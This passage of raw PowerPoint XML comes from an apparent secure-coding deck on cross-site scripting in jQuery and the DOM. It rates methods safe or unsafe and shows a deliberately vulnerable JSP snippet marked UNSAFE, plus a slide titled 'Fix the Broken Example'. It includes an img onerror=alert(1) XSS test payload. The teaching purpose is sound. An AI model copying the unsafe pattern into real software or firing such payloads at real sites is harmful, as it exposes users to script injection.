                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(1)&gt;")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jQuery.globalEval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All event handlers: .bind(events), .bind(type, [,data], handler()), .on(), .add(html)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="3423691"/>
            <a:ext cx="2630028" cy="1126895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="274320" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:no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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Safe Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3185759" y="3473368"/>
            <a:ext cx="5958242" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="457200" bIns="91440" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="9E9187"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="18288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3pPr>
            <a:lvl4pPr marL="365760" indent="-182880" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="9E9187"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="548640" indent="-182880" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="9E91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2024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.text(danger)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(danger)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="192024" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.html(DOMPurify.sanitize(danger));</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6997754" y="298517"/>
            <a:ext cx="1465134" cy="1484240"/>
            <a:chOff x="6835420" y="616218"/>
            <a:chExt cx="1465134" cy="1484240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Oval 12"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solid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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:noFill/>
                <a:tailEnd type="triangle" w="lg" len="lg"/>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0" rIns="91440" bIns="91440" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="en-US" sz="8000" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7327992" y="616218"/>
              <a:ext cx="475132" cy="1477328"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="9600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="5096337"/>
            <a:ext cx="8686800" cy="394980"/>
            <a:chOff x="0" y="4591841"/>
            <a:chExt cx="8686800" cy="394980"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3492291" y="4591841"/>
              <a:ext cx="5194509" cy="394980"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="2400"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" i="1">
                  <a:solidFill>
                    <a:srgbClr val="DB3D16"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>There are about 300 methods in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" i="1" err="1">
                  <a:solidFill>
                    <a:srgbClr val="DB3D16"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>jQuery</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="4812186"/>
              <a:ext cx="3393762" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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457200" y="4681129"/>
            <a:ext cx="8229600" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some serious research needs to be done to identify all the safe vs. unsafe methods.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1910198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0694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Using Safe Functions Safely</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5884654"/>
            <a:ext cx="8229600" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tech.blog.box.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/2013/08/securing-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-against-unintended-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33480440"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1367893"/>
          <a:ext cx="8229600" cy="1863145"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8229600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2597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solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>someoldpage.jsp     UNSAFE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="1828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B3D16"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1558345">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;script&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>var elem = document.getElementById('elementId');</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>elem.textContent = '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;%= request.getParameter("data") %&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>';</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" kern="1200">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;/script&gt;</a:t>
                      </a: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1814899679"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="3467706"/>
          <a:ext cx="8229600" cy="1707576"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8229600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1473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solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>somescript.js       SAFE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="1828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B3D16"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1402776">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>function somecoolstuff(var elem, var data) {</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>    elem.textContent = data;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" kern="1200">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a: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8192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0694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Fix the Broken Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>93</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1659964779"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1367893"/>
          <a:ext cx="8229600" cy="1863145"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8229600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2597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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>someoldpage.jsp     UNSAFE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="18288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B3D16"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1558345">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;script&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>var elem = document.getElementById('elementId');</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
